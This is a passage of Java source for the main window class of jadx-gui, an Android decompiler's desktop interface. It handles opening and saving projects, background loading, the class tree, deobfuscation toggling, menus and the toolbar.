private static final Logger LOG = LoggerFactory.getLogger(MainWindow.class);
private static final String DEFAULT_TITLE = "jadx-gui";
private static final double BORDER_RATIO = 0.15;
private static final double WINDOW_RATIO = 1 - BORDER_RATIO * 2;
public static final double SPLIT_PANE_RESIZE_WEIGHT = 0.15;
private static final ImageIcon ICON_ADD_FILES = UiUtils.openSvgIcon("ui/addFile");
private static final ImageIcon ICON_RELOAD = UiUtils.openSvgIcon("ui/refresh");
private static final ImageIcon ICON_EXPORT = UiUtils.openSvgIcon("ui/export");
private static final ImageIcon ICON_EXIT = UiUtils.openSvgIcon("ui/exit");
private static final ImageIcon ICON_SYNC = UiUtils.openSvgIcon("ui/pagination");
private static final ImageIcon ICON_FLAT_PKG = UiUtils.openSvgIcon("ui/moduleGroup");
private static final ImageIcon ICON_SEARCH = UiUtils.openSvgIcon("ui/find");
private static final ImageIcon ICON_FIND = UiUtils.openSvgIcon("ui/ejbFinderMethod");
private static final ImageIcon ICON_COMMENT_SEARCH = UiUtils.openSvgIcon("ui/usagesFinder");
private static final ImageIcon ICON_MAIN_ACTIVITY = UiUtils.openSvgIcon("ui/home");
private static final ImageIcon ICON_BACK = UiUtils.openSvgIcon("ui/left");
private static final ImageIcon ICON_FORWARD = UiUtils.openSvgIcon("ui/right");
private static final ImageIcon ICON_QUARK = UiUtils.openSvgIcon("ui/quark");
private static final ImageIcon ICON_PREF = UiUtils.openSvgIcon("ui/settings");
private static final ImageIcon ICON_DEOBF = UiUtils.openSvgIcon("ui/helmChartLock");
private static final ImageIcon ICON_DECOMPILE_ALL = UiUtils.openSvgIcon("ui/runAll");
private static final ImageIcon ICON_LOG = UiUtils.openSvgIcon("ui/logVerbose");
private static final ImageIcon ICON_INFO = UiUtils.openSvgIcon("ui/showInfos");
private static final ImageIcon ICON_DEBUGGER = UiUtils.openSvgIcon("ui/startDebugger");
private final transient JadxWrapper wrapper;
private final transient JadxSettings settings;
private final transient CacheObject cacheObject;
private final transient CacheManager cacheManager;
private final transient BackgroundExecutor backgroundExecutor;
private transient @NotNull JadxProject project;
private transient JadxGuiAction newProjectAction;
private transient JadxGuiAction saveProjectAction;
private transient JPanel mainPanel;
private transient JSplitPane treeSplitPane;
private transient JSplitPane rightSplitPane;
private transient JSplitPane bottomSplitPane;
private JTree tree;
private DefaultTreeModel treeModel;
private JRoot treeRoot;
private TabbedPane tabbedPane;
private HeapUsageBar heapUsageBar;
private transient boolean treeReloading;
private boolean isFlattenPackage;
private JToggleButton flatPkgButton;
private JCheckBoxMenuItem flatPkgMenuItem;
private JToggleButton deobfToggleBtn;
private JCheckBoxMenuItem deobfMenuItem;
private JCheckBoxMenuItem liveReloadMenuItem;
private final LiveReloadWorker liveReloadWorker;
private transient Link updateLink;
private transient ProgressPanel progressPane;
private transient Theme editorTheme;
private transient IssuesPanel issuesPanel;
private transient @Nullable LogPanel logPanel;
private transient @Nullable JDebuggerPanel debuggerPanel;
private final List<ILoadListener> loadListeners = new ArrayList<>();
private final List<Consumer<JRoot>> treeUpdateListener = new ArrayList<>();
private boolean loaded;
private boolean settingsOpen = false;
private ShortcutsController shortcutsController;
private JadxMenuBar menuBar;
private JMenu pluginsMenu;
private final transient RenameMappingsGui renameMappings;
public MainWindow(JadxSettings settings) {
this.settings = settings;
this.cacheObject = new CacheObject();
this.project = new JadxProject(this);
this.wrapper = new JadxWrapper(this);
this.liveReloadWorker = new LiveReloadWorker(this);
this.renameMappings = new RenameMappingsGui(this);
this.cacheManager = new CacheManager(settings);
this.shortcutsController = new ShortcutsController(settings);
resetCache();
FontUtils.registerBundledFonts();
setEditorTheme(settings.getEditorThemePath());
initUI();
this.backgroundExecutor = new BackgroundExecutor(settings, progressPane);
initMenuAndToolbar();
UiUtils.setWindowIcons(this);
shortcutsController.registerMouseEventListener(this);
loadSettings();
update();
checkForUpdate();
}
public void init() {
pack();
setLocationAndPosition();
treeSplitPane.setDividerLocation(settings.getTreeWidth());
heapUsageBar.setVisible(settings.isShowHeapUsageBar());
setVisible(true);
setDefaultCloseOperation(WindowConstants.DO_NOTHING_ON_CLOSE);
addWindowListener(new WindowAdapter() {
@Override
public void windowClosing(WindowEvent e) {
closeWindow();
}
});
processCommandLineArgs();
}
private void processCommandLineArgs() {
if (settings.getFiles().isEmpty()) {
tabbedPane.showNode(new StartPageNode());
} else {
open(FileUtils.fileNamesToPaths(settings.getFiles()), this::handleSelectClassOption);
}
}
private void handleSelectClassOption() {
if (settings.getCmdSelectClass() != null) {
JavaNode javaNode = wrapper.searchJavaClassByFullAlias(settings.getCmdSelectClass());
if (javaNode == null) {
javaNode = wrapper.searchJavaClassByOrigClassName(settings.getCmdSelectClass());
}
if (javaNode == null) {
JOptionPane.showMessageDialog(this,
NLS.str("msg.cmd_select_class_error", settings.getCmdSelectClass()),
NLS.str("error_dialog.title"), JOptionPane.ERROR_MESSAGE);
return;
}
tabbedPane.codeJump(cacheObject.getNodeCache().makeFrom(javaNode));
}
}
private void checkForUpdate() {
if (!settings.isCheckForUpdates()) {
return;
}
JadxUpdate.check(new IUpdateCallback() {
@Override
public void onUpdate(Release r) {
SwingUtilities.invokeLater(() -> {
updateLink.setText(NLS.str("menu.update_label", r.getName()));
updateLink.setVisible(true);
});
}
});
}
public void openFileDialog() {
showOpenDialog(FileOpenMode.OPEN);
}
public void openProjectDialog() {
showOpenDialog(FileOpenMode.OPEN_PROJECT);
}
private void showOpenDialog(FileOpenMode mode) {
saveAll();
if (!ensureProjectIsSaved()) {
return;
}
FileDialogWrapper fileDialog = new FileDialogWrapper(this, mode);
List<Path> openPaths = fileDialog.show();
if (!openPaths.isEmpty()) {
settings.setLastOpenFilePath(fileDialog.getCurrentDir());
open(openPaths);
}
}
public void addFiles() {
FileDialogWrapper fileDialog = new FileDialogWrapper(this, FileOpenMode.ADD);
List<Path> addPaths = fileDialog.show();
if (!addPaths.isEmpty()) {
addFiles(addPaths);
}
}
public void addFiles(List<Path> addPaths) {
project.setFilePaths(ListUtils.distinctMergeSortedLists(addPaths, project.getFilePaths()));
reopen();
}
private void newProject() {
saveAll();
if (!ensureProjectIsSaved()) {
return;
}
closeAll();
updateProject(new JadxProject(this));
}
private void saveProject() {
if (!project.isSaveFileSelected()) {
saveProjectAs();
} else {
project.save();
update();
}
}
private void saveProjectAs() {
FileDialogWrapper fileDialog = new FileDialogWrapper(this, FileOpenMode.SAVE_PROJECT);
if (project.getFilePaths().size() == 1) {
			// If there is only one file loaded, we suggest saving the jadx project file next to the loaded file
Path projectPath = getProjectPathForFile(this.project.getFilePaths().get(0));
fileDialog.setSelectedFile(projectPath);
}
List<Path> saveFiles = fileDialog.show();
if (saveFiles.isEmpty()) {
return;
}
settings.setLastSaveProjectPath(fileDialog.getCurrentDir());
Path savePath = saveFiles.get(0);
if (!savePath.getFileName().toString().toLowerCase(Locale.ROOT).endsWith(JadxProject.PROJECT_EXTENSION)) {
savePath = savePath.resolveSibling(savePath.getFileName() + "." + JadxProject.PROJECT_EXTENSION);
}
if (Files.exists(savePath)) {
int res = JOptionPane.showConfirmDialog(
this,
NLS.str("confirm.save_as_message", savePath.getFileName()),
NLS.str("confirm.save_as_title"),
JOptionPane.YES_NO_OPTION);
if (res == JOptionPane.NO_OPTION) {
return;
}
}
project.saveAs(savePath);
settings.addRecentProject(savePath);
update();
}
public void addNewScript() {
FileDialogWrapper fileDialog = new FileDialogWrapper(this, FileOpenMode.CUSTOM_SAVE);
fileDialog.setTitle(NLS.str("file.save"));
Path workingDir = project.getWorkingDir();
Path baseDir = workingDir != null ? workingDir : settings.getLastSaveFilePath();
fileDialog.setSelectedFile(baseDir.resolve("script.jadx.kts"));
fileDialog.setFileExtList(Collections.singletonList("jadx.kts"));
fileDialog.setSelectionMode(JFileChooser.FILES_ONLY);
List<Path> paths = fileDialog.show();
if (paths.size() != 1) {
return;
}
Path scriptFile = paths.get(0);
try {
TemplateFile tmpl = TemplateFile.fromResources("/files/script.jadx.kts.tmpl");
FileUtils.writeFile(scriptFile, tmpl.build());
} catch (Exception e) {
LOG.error("Failed to save new script file: {}", scriptFile, e);
}
List<Path> inputs = project.getFilePaths();
inputs.add(scriptFile);
project.setFilePaths(inputs);
project.save();
reopen();
}
public void removeInput(Path file) {
List<Path> inputs = project.getFilePaths();
inputs.remove(file);
project.setFilePaths(inputs);
project.save();
reopen();
}
public void open(Path path) {
open(Collections.singletonList(path), EMPTY_RUNNABLE);
}
public void open(List<Path> paths) {
open(paths, EMPTY_RUNNABLE);
}
private void open(List<Path> paths, Runnable onFinish) {
saveAll();
closeAll();
if (paths.size() == 1 && openSingleFile(paths.get(0), onFinish)) {
return;
}
// start new project
project = new JadxProject(this);
project.setFilePaths(paths);
loadFiles(onFinish);
}
private boolean openSingleFile(Path singleFile, Runnable onFinish) {
if (singleFile.getFileName() == null) {
return false;
}
String fileExtension = CommonFileUtils.getFileExtension(singleFile.getFileName().toString());
if (fileExtension != null && fileExtension.equalsIgnoreCase(JadxProject.PROJECT_EXTENSION)) {
openProject(singleFile, onFinish);
return true;
}
		// check if a project file was already saved with the default name
Path projectPath = getProjectPathForFile(singleFile);
if (Files.exists(projectPath)) {
openProject(projectPath, onFinish);
return true;
}
return false;
}
private static Path getProjectPathForFile(Path loadedFile) {
String fileName = loadedFile.getFileName() + "." + JadxProject.PROJECT_EXTENSION;
return loadedFile.resolveSibling(fileName);
}
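	// Example (hypothetical paths): for a loaded file "/work/app.apk", getProjectPathForFile()
	// returns "/work/app.apk." + JadxProject.PROJECT_EXTENSION, so the default project file is
	// looked up and saved right next to the loaded file.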
public void reopen() {
synchronized (ReloadProject.EVENT) {
saveAll();
closeAll();
loadFiles(EMPTY_RUNNABLE);
menuBar.reloadShortcuts();
}
}
private void openProject(Path path, Runnable onFinish) {
LOG.debug("Loading project: {}", path);
JadxProject jadxProject = JadxProject.load(this, path);
if (jadxProject == null) {
JOptionPane.showMessageDialog(
this,
NLS.str("msg.project_error"),
NLS.str("msg.project_error_title"),
JOptionPane.INFORMATION_MESSAGE);
jadxProject = new JadxProject(this);
}
settings.addRecentProject(path);
project = jadxProject;
loadFiles(onFinish);
}
private void loadFiles(Runnable onFinish) {
if (project.getFilePaths().isEmpty()) {
tabbedPane.showNode(new StartPageNode());
return;
}
AtomicReference<Exception> wrapperException = new AtomicReference<>();
backgroundExecutor.execute(NLS.str("progress.load"),
() -> {
try {
wrapper.open();
} catch (Exception e) {
wrapperException.set(e);
}
},
status -> {
if (wrapperException.get() != null) {
closeAll();
Exception e = wrapperException.get();
if (e instanceof RuntimeException) {
throw (RuntimeException) e;
} else {
throw new JadxRuntimeException("Project load error", e);
}
}
if (status == TaskStatus.CANCEL_BY_MEMORY) {
showHeapUsageBar();
UiUtils.errorMessage(this, NLS.str("message.memoryLow"));
return;
}
if (status != TaskStatus.COMPLETE) {
LOG.warn("Loading task incomplete, status: {}", status);
return;
}
checkLoadedStatus();
onOpen();
onFinish.run();
});
}
private void saveAll() {
saveOpenTabs();
BreakpointManager.saveAndExit();
}
private void closeAll() {
notifyLoadListeners(false);
cancelBackgroundJobs();
clearTree();
resetCache();
LogCollector.getInstance().reset();
wrapper.close();
tabbedPane.closeAllTabs();
UiUtils.resetClipboardOwner();
System.gc();
update();
}
private void checkLoadedStatus() {
if (!wrapper.getClasses().isEmpty()) {
return;
}
int errors = issuesPanel.getErrorsCount();
if (errors > 0) {
int result = JOptionPane.showConfirmDialog(this,
NLS.str("message.load_errors", errors),
NLS.str("message.errorTitle"),
JOptionPane.OK_CANCEL_OPTION,
JOptionPane.ERROR_MESSAGE);
if (result == JOptionPane.OK_OPTION) {
showLogViewer(LogOptions.allWithLevel(Level.ERROR));
}
} else {
UiUtils.showMessageBox(this, NLS.str("message.no_classes"));
}
}
private void onOpen() {
initTree();
updateLiveReload(project.isEnableLiveReload());
BreakpointManager.init(project.getFilePaths().get(0).toAbsolutePath().getParent());
initEvents();
List<EditorViewState> openTabs = project.getOpenTabs(this);
backgroundExecutor.execute(NLS.str("progress.load"),
() -> preLoadOpenTabs(openTabs),
status -> {
restoreOpenTabs(openTabs);
runInitialBackgroundJobs();
notifyLoadListeners(true);
update();
});
}
public void passesReloaded() {
initEvents(); // TODO: events reset on reload passes on script run
tabbedPane.reloadInactiveTabs();
reloadTree();
}
private void initEvents() {
events().addListener(JadxEvents.RELOAD_PROJECT, ev -> UiUtils.uiRun(this::reopen));
RenameService.init(this);
}
public void updateLiveReload(boolean state) {
if (liveReloadWorker.isStarted() == state) {
return;
}
project.setEnableLiveReload(state);
liveReloadMenuItem.setEnabled(false);
backgroundExecutor.execute(
(state ? "Starting" : "Stopping") + " live reload",
() -> liveReloadWorker.updateState(state),
s -> {
liveReloadMenuItem.setState(state);
liveReloadMenuItem.setEnabled(true);
});
}
private void addTreeCustomNodes() {
treeRoot.replaceCustomNode(ApkSignature.getApkSignature(wrapper));
treeRoot.replaceCustomNode(new SummaryNode(this));
}
private boolean ensureProjectIsSaved() {
if (!project.isSaved() && !project.isInitial()) {
// Check if we saved settings that indicate what to do
if (settings.getSaveOption() == JadxSettings.SAVEOPTION.NEVER) {
return true;
}
if (settings.getSaveOption() == JadxSettings.SAVEOPTION.ALWAYS) {
saveProject();
return true;
}
JCheckBox remember = new JCheckBox(NLS.str("confirm.remember"));
JLabel message = new JLabel(NLS.str("confirm.not_saved_message"));
JPanel inner = new JPanel(new BorderLayout());
inner.add(remember, BorderLayout.SOUTH);
inner.add(message, BorderLayout.NORTH);
int res = JOptionPane.showConfirmDialog(
this,
inner,
NLS.str("confirm.not_saved_title"),
JOptionPane.YES_NO_CANCEL_OPTION);
if (res == JOptionPane.CANCEL_OPTION) {
return false;
}
if (res == JOptionPane.YES_OPTION) {
if (remember.isSelected()) {
settings.setSaveOption(JadxSettings.SAVEOPTION.ALWAYS);
settings.sync();
}
saveProject();
} else if (res == JOptionPane.NO_OPTION) {
if (remember.isSelected()) {
settings.setSaveOption(JadxSettings.SAVEOPTION.NEVER);
settings.sync();
}
}
}
return true;
}
public void updateProject(@NotNull JadxProject jadxProject) {
this.project = jadxProject;
UiUtils.uiRun(this::update);
}
public void update() {
UiUtils.uiThreadGuard();
newProjectAction.setEnabled(!project.isInitial());
saveProjectAction.setEnabled(loaded && !project.isSaved());
deobfToggleBtn.setSelected(settings.isDeobfuscationOn());
renameMappings.onUpdate(loaded);
Path projectPath = project.getProjectPath();
String pathString;
if (projectPath == null) {
pathString = "";
} else {
pathString = " [" + projectPath.toAbsolutePath().getParent() + ']';
}
setTitle((project.isSaved() ? "" : '*')
+ project.getName() + pathString + " - " + DEFAULT_TITLE);
}
protected void resetCache() {
cacheObject.reset();
}
synchronized void runInitialBackgroundJobs() {
if (settings.isAutoStartJobs()) {
new Timer().schedule(new TimerTask() {
@Override
public void run() {
requestFullDecompilation();
}
}, 1000);
}
}
public void requestFullDecompilation() {
if (cacheObject.isFullDecompilationFinished()) {
return;
}
backgroundExecutor.execute(new DecompileTask(this));
}
public void resetCodeCache() {
backgroundExecutor.execute(
NLS.str("preferences.cache.task.delete"),
() -> {
try {
getWrapper().getCurrentDecompiler().ifPresent(jadx -> {
try {
jadx.getArgs().getCodeCache().close();
} catch (Exception e) {
LOG.error("Failed to close code cache", e);
}
});
Path cacheDir = project.getCacheDir();
project.resetCacheDir();
FileUtils.deleteDirIfExists(cacheDir);
} catch (Exception e) {
LOG.error("Error during code cache reset", e);
}
},
status -> events().send(ReloadProject.EVENT));
}
public void cancelBackgroundJobs() {
backgroundExecutor.cancelAll();
}
private void saveAll(boolean export) {
FileDialogWrapper fileDialog = new FileDialogWrapper(this, FileOpenMode.EXPORT);
List<Path> saveDirs = fileDialog.show();
if (saveDirs.isEmpty()) {
return;
}
JadxArgs decompilerArgs = wrapper.getArgs();
decompilerArgs.setExportAsGradleProject(export);
if (export) {
decompilerArgs.setSkipSources(false);
decompilerArgs.setSkipResources(false);
} else {
decompilerArgs.setSkipSources(settings.isSkipSources());
decompilerArgs.setSkipResources(settings.isSkipResources());
}
settings.setLastSaveFilePath(fileDialog.getCurrentDir());
backgroundExecutor.execute(new ExportTask(this, wrapper, saveDirs.get(0).toFile()));
}
public void initTree() {
treeRoot = new JRoot(wrapper);
treeRoot.setFlatPackages(isFlattenPackage);
treeModel.setRoot(treeRoot);
addTreeCustomNodes();
treeRoot.update();
reloadTree();
}
private void clearTree() {
tabbedPane.reset();
treeRoot = null;
treeModel.setRoot(null);
treeModel.reload();
}
public void reloadTree() {
treeReloading = true;
treeUpdateListener.forEach(listener -> listener.accept(treeRoot));
treeModel.reload();
List<String[]> treeExpansions = project.getTreeExpansions();
if (!treeExpansions.isEmpty()) {
expand(treeRoot, treeExpansions);
} else {
tree.expandRow(1);
}
treeReloading = false;
}
public void rebuildPackagesTree() {
cacheObject.setPackageHelper(null);
treeRoot.update();
}
private void expand(TreeNode node, List<String[]> treeExpansions) {
TreeNode[] pathNodes = treeModel.getPathToRoot(node);
if (pathNodes == null) {
return;
}
TreePath path = new TreePath(pathNodes);
for (String[] expansion : treeExpansions) {
if (Arrays.equals(expansion, getPathExpansion(path))) {
tree.expandPath(path);
break;
}
}
for (int i = node.getChildCount() - 1; i >= 0; i--) {
expand(node.getChildAt(i), treeExpansions);
}
}
private void toggleFlattenPackage() {
setFlattenPackage(!isFlattenPackage);
}
private void setFlattenPackage(boolean value) {
isFlattenPackage = value;
settings.setFlattenPackage(isFlattenPackage);
flatPkgButton.setSelected(isFlattenPackage);
flatPkgMenuItem.setState(isFlattenPackage);
Object root = treeModel.getRoot();
if (root instanceof JRoot) {
JRoot treeRoot = (JRoot) root;
treeRoot.setFlatPackages(isFlattenPackage);
reloadTree();
}
}
private void toggleDeobfuscation() {
boolean deobfOn = !settings.isDeobfuscationOn();
settings.setDeobfuscationOn(deobfOn);
settings.sync();
deobfToggleBtn.setSelected(deobfOn);
deobfMenuItem.setState(deobfOn);
reopen();
}
private boolean nodeClickAction(@Nullable Object obj) {
if (obj == null) {
return false;
}
try {
if (obj instanceof JResource) {
JResource res = (JResource) obj;
ResourceFile resFile = res.getResFile();
if (resFile != null && JResource.isSupportedForView(resFile.getType())) {
return tabbedPane.showNode(res);
}
} else if (obj instanceof JNode) {
JNode node = (JNode) obj;
if (node.getRootClass() != null) {
tabbedPane.codeJump(node);
return true;
}
return tabbedPane.showNode(node);
}
} catch (Exception e) {
LOG.error("Content loading error", e);
}
return false;
}
private void treeRightClickAction(MouseEvent e) {
JNode node = getJNodeUnderMouse(e);
if (node == null) {
return;
}
JPopupMenu menu = node.onTreePopupMenu(this);
if (menu != null) {
menu.show(e.getComponent(), e.getX(), e.getY());
}
}
@Nullable
private JNode getJNodeUnderMouse(MouseEvent mouseEvent) {
TreePath path = tree.getClosestPathForLocation(mouseEvent.getX(), mouseEvent.getY());
if (path == null) {
return null;
}
// allow 'closest' path only at the right of the item row
Rectangle pathBounds = tree.getPathBounds(path);
if (pathBounds != null) {
int y = mouseEvent.getY();
if (y < pathBounds.y || y > (pathBounds.y + pathBounds.height)) {
return null;
}
if (mouseEvent.getX() < pathBounds.x) {
// exclude expand/collapse events
return null;
}
}
Object obj = path.getLastPathComponent();
if (obj instanceof JNode) {
tree.setSelectionPath(path);
return (JNode) obj;
}
return null;
}
public void syncWithEditor() {
ContentPanel selectedContentPanel = tabbedPane.getSelectedContentPanel();
if (selectedContentPanel == null) {
return;
}
JNode node = selectedContentPanel.getNode();
if (node.getParent() == null && treeRoot != null) {
// node not registered in tree
node = treeRoot.searchNode(node);
if (node == null) {
LOG.error("Class not found in tree");
return;
}
}
TreeNode[] pathNodes = treeModel.getPathToRoot(node);
if (pathNodes == null) {
return;
}
TreePath path = new TreePath(pathNodes);
tree.setSelectionPath(path);
tree.makeVisible(path);
tree.scrollPathToVisible(path);
tree.requestFocus();
}
public void textSearch() {
ContentPanel panel = tabbedPane.getSelectedContentPanel();
if (panel instanceof AbstractCodeContentPanel) {
AbstractCodeArea codeArea = ((AbstractCodeContentPanel) panel).getCodeArea();
String preferText = codeArea.getSelectedText();
if (StringUtils.isEmpty(preferText)) {
preferText = codeArea.getWordUnderCaret();
}
if (!StringUtils.isEmpty(preferText)) {
SearchDialog.searchText(MainWindow.this, preferText);
return;
}
}
SearchDialog.search(MainWindow.this, SearchDialog.SearchPreset.TEXT);
}
public void gotoMainActivity() {
AndroidManifestParser parser = new AndroidManifestParser(
AndroidManifestParser.getAndroidManifest(getWrapper().getResources()),
EnumSet.of(AppAttribute.MAIN_ACTIVITY));
if (!parser.isManifestFound()) {
JOptionPane.showMessageDialog(MainWindow.this,
NLS.str("error_dialog.not_found", "AndroidManifest.xml"),
NLS.str("error_dialog.title"),
JOptionPane.ERROR_MESSAGE);
return;
}
try {
ApplicationParams results = parser.parse();
if (results.getMainActivityName() == null) {
throw new JadxRuntimeException("Failed to get main activity name from manifest");
}
JavaClass mainActivityClass = results.getMainActivity(getWrapper().getDecompiler());
if (mainActivityClass == null) {
throw new JadxRuntimeException("Failed to find main activity class: " + results.getMainActivityName());
}
tabbedPane.codeJump(getCacheObject().getNodeCache().makeFrom(mainActivityClass));
} catch (Exception e) {
LOG.error("Main activity not found", e);
JOptionPane.showMessageDialog(MainWindow.this,
NLS.str("error_dialog.not_found", "Main Activity"),
NLS.str("error_dialog.title"),
JOptionPane.ERROR_MESSAGE);
}
}
private void initMenuAndToolbar() {
JadxGuiAction openAction = new JadxGuiAction(ActionModel.OPEN, this::openFileDialog);
JadxGuiAction openProject = new JadxGuiAction(ActionModel.OPEN_PROJECT, this::openProjectDialog);
JadxGuiAction addFilesAction = new JadxGuiAction(ActionModel.ADD_FILES, () -> addFiles());
newProjectAction = new JadxGuiAction(ActionModel.NEW_PROJECT, this::newProject);
saveProjectAction = new JadxGuiAction(ActionModel.SAVE_PROJECT, this::saveProject);
JadxGuiAction saveProjectAsAction = new JadxGuiAction(ActionModel.SAVE_PROJECT_AS, this::saveProjectAs);
JadxGuiAction reloadAction = new JadxGuiAction(ActionModel.RELOAD, () -> UiUtils.uiRun(this::reopen));
JadxGuiAction liveReloadAction = new JadxGuiAction(ActionModel.LIVE_RELOAD,
() -> updateLiveReload(!project.isEnableLiveReload()));
liveReloadMenuItem = new JCheckBoxMenuItem(liveReloadAction);
liveReloadMenuItem.setState(project.isEnableLiveReload());
JadxGuiAction saveAllAction = new JadxGuiAction(ActionModel.SAVE_ALL, () -> saveAll(false));
JadxGuiAction exportAction = new JadxGuiAction(ActionModel.EXPORT, () -> saveAll(true));
JMenu recentProjects = new JadxMenu(NLS.str("menu.recent_projects"), shortcutsController);
recentProjects.addMenuListener(new RecentProjectsMenuListener(this, recentProjects));
JadxGuiAction prefsAction = new JadxGuiAction(ActionModel.PREFS, this::openSettings);
JadxGuiAction exitAction = new JadxGuiAction(ActionModel.EXIT, this::closeWindow);
isFlattenPackage = settings.isFlattenPackage();
flatPkgMenuItem = new JCheckBoxMenuItem(NLS.str("menu.flatten"), ICON_FLAT_PKG);
flatPkgMenuItem.setState(isFlattenPackage);
JCheckBoxMenuItem heapUsageBarMenuItem = new JCheckBoxMenuItem(NLS.str("menu.heapUsageBar"));
heapUsageBarMenuItem.setState(settings.isShowHeapUsageBar());
heapUsageBarMenuItem.addActionListener(event -> {
settings.setShowHeapUsageBar(!settings.isShowHeapUsageBar());
heapUsageBar.setVisible(settings.isShowHeapUsageBar());
});
JCheckBoxMenuItem alwaysSelectOpened = new JCheckBoxMenuItem(NLS.str("menu.alwaysSelectOpened"));
alwaysSelectOpened.setState(settings.isAlwaysSelectOpened());
alwaysSelectOpened.addActionListener(event -> {
settings.setAlwaysSelectOpened(!settings.isAlwaysSelectOpened());
if (settings.isAlwaysSelectOpened()) {
this.syncWithEditor();
}
});
JCheckBoxMenuItem dockLog = new JCheckBoxMenuItem(NLS.str("menu.dock_log"));
dockLog.setState(settings.isDockLogViewer());
dockLog.addActionListener(event -> settings.setDockLogViewer(!settings.isDockLogViewer()));
JadxGuiAction syncAction = new JadxGuiAction(ActionModel.SYNC, this::syncWithEditor);
JadxGuiAction textSearchAction = new JadxGuiAction(ActionModel.TEXT_SEARCH, this::textSearch);
JadxGuiAction clsSearchAction = new JadxGuiAction(ActionModel.CLASS_SEARCH,
() -> SearchDialog.search(MainWindow.this, SearchDialog.SearchPreset.CLASS));
JadxGuiAction commentSearchAction = new JadxGuiAction(ActionModel.COMMENT_SEARCH,
() -> SearchDialog.search(MainWindow.this, SearchDialog.SearchPreset.COMMENT));
JadxGuiAction gotoMainActivityAction = new JadxGuiAction(ActionModel.GOTO_MAIN_ACTIVITY,
this::gotoMainActivity);
JadxGuiAction decompileAllAction = new JadxGuiAction(ActionModel.DECOMPILE_ALL, this::requestFullDecompilation);
JadxGuiAction resetCacheAction = new JadxGuiAction(ActionModel.RESET_CACHE, this::resetCodeCache);
JadxGuiAction deobfAction = new JadxGuiAction(ActionModel.DEOBF, this::toggleDeobfuscation);
deobfToggleBtn = new JToggleButton(deobfAction);
deobfToggleBtn.setSelected(settings.isDeobfuscationOn());
deobfToggleBtn.setText("");
deobfMenuItem = new JCheckBoxMenuItem(deobfAction);
deobfMenuItem.setState(settings.isDeobfuscationOn());
JadxGuiAction showLogAction = new JadxGuiAction(ActionModel.SHOW_LOG,
() -> showLogViewer(LogOptions.current()));
JadxGuiAction aboutAction = new JadxGuiAction(ActionModel.ABOUT, () -> new AboutDialog().setVisible(true));
JadxGuiAction backAction = new JadxGuiAction(ActionModel.BACK, tabbedPane::navBack);
JadxGuiAction backVariantAction = new JadxGuiAction(ActionModel.BACK_V, tabbedPane::navBack);
JadxGuiAction forwardAction = new JadxGuiAction(ActionModel.FORWARD, tabbedPane::navForward);
JadxGuiAction forwardVariantAction = new JadxGuiAction(ActionModel.FORWARD_V, tabbedPane::navForward);
JadxGuiAction quarkAction = new JadxGuiAction(ActionModel.QUARK,
() -> new QuarkDialog(MainWindow.this).setVisible(true));
JadxGuiAction openDeviceAction = new JadxGuiAction(ActionModel.OPEN_DEVICE,
() -> new ADBDialog(MainWindow.this).setVisible(true));
JMenu file = new JadxMenu(NLS.str("menu.file"), shortcutsController);
file.setMnemonic(KeyEvent.VK_F);
file.add(openAction);
file.add(openProject);
file.add(addFilesAction);
file.addSeparator();
file.add(newProjectAction);
file.add(saveProjectAction);
file.add(saveProjectAsAction);
file.addSeparator();
file.add(reloadAction);
file.add(liveReloadMenuItem);
renameMappings.addMenuActions(file);
file.addSeparator();
file.add(saveAllAction);
file.add(exportAction);
file.addSeparator();
file.add(recentProjects);
file.addSeparator();
file.add(prefsAction);
file.addSeparator();
file.add(exitAction);
JMenu view = new JadxMenu(NLS.str("menu.view"), shortcutsController);
view.setMnemonic(KeyEvent.VK_V);
view.add(flatPkgMenuItem);
view.add(syncAction);
view.add(heapUsageBarMenuItem);
view.add(alwaysSelectOpened);
view.add(dockLog);
JMenu nav = new JadxMenu(NLS.str("menu.navigation"), shortcutsController);
nav.setMnemonic(KeyEvent.VK_N);
nav.add(textSearchAction);
nav.add(clsSearchAction);
nav.add(commentSearchAction);
nav.add(gotoMainActivityAction);
nav.addSeparator();
nav.add(backAction);
nav.add(forwardAction);
pluginsMenu = new JadxMenu(NLS.str("menu.plugins"), shortcutsController);
pluginsMenu.setMnemonic(KeyEvent.VK_P);
resetPluginsMenu();
JMenu tools = new JadxMenu(NLS.str("menu.tools"), shortcutsController);
tools.setMnemonic(KeyEvent.VK_T);
tools.add(decompileAllAction);
tools.add(resetCacheAction);
tools.add(deobfMenuItem);
tools.add(quarkAction);
tools.add(openDeviceAction);
JMenu help = new JadxMenu(NLS.str("menu.help"), shortcutsController);
help.setMnemonic(KeyEvent.VK_H);
help.add(showLogAction);
if (Jadx.isDevVersion()) {
help.add(new AbstractAction("Show sample error report") {
@Override
public void actionPerformed(ActionEvent e) {
ExceptionDialog.throwTestException();
}
});
}
help.add(aboutAction);
menuBar = new JadxMenuBar();
menuBar.add(file);
menuBar.add(view);
menuBar.add(nav);
menuBar.add(tools);
menuBar.add(pluginsMenu);
menuBar.add(help);
setJMenuBar(menuBar);
flatPkgButton = new JToggleButton(ICON_FLAT_PKG);
flatPkgButton.setSelected(isFlattenPackage);
ActionListener flatPkgAction = e -> toggleFlattenPackage();
flatPkgMenuItem.addActionListener(flatPkgAction);
flatPkgButton.addActionListener(flatPkgAction);
flatPkgButton.setToolTipText(NLS.str("menu.flatten"));
updateLink = new Link("", JadxUpdate.JADX_RELEASES_URL);
updateLink.setVisible(false);
JToolBar toolbar = new JToolBar();
toolbar.setFloatable(false);
toolbar.add(openAction);
toolbar.add(addFilesAction);
toolbar.addSeparator();
toolbar.add(reloadAction);
toolbar.addSeparator();
toolbar.add(saveAllAction);
toolbar.add(exportAction);
toolbar.addSeparator();
toolbar.add(syncAction);
toolbar.add(flatPkgButton);
toolbar.addSeparator();
toolbar.add(textSearchAction);
toolbar.add(clsSearchAction);
toolbar.add(commentSearchAction);
toolbar.add(gotoMainActivityAction);
toolbar.addSeparator();
toolbar.add(backAction);
toolbar.add(forwardAction);
toolbar.addSeparator();
toolbar.add(deobfToggleBtn);
toolbar.add(quarkAction);
toolbar.add(openDeviceAction);
toolbar.addSeparator();
toolbar.add(showLogAction);
toolbar.addSeparator();
toolbar.add(prefsAction);
toolbar.addSeparator();
toolbar.add(Box.createHorizontalGlue());
toolbar.add(updateLink);
mainPanel.add(toolbar, BorderLayout.NORTH);
nav.add(new HiddenMenuItem(backVariantAction));
nav.add(new HiddenMenuItem(forwardVariantAction));
shortcutsController.bind(backVariantAction);
shortcutsController.bind(forwardVariantAction);
addLoadListener(loaded -> {
textSearchAction.setEnabled(loaded);
clsSearchAction.setEnabled(loaded);
commentSearchAction.setEnabled(loaded);
gotoMainActivityAction.setEnabled(loaded);
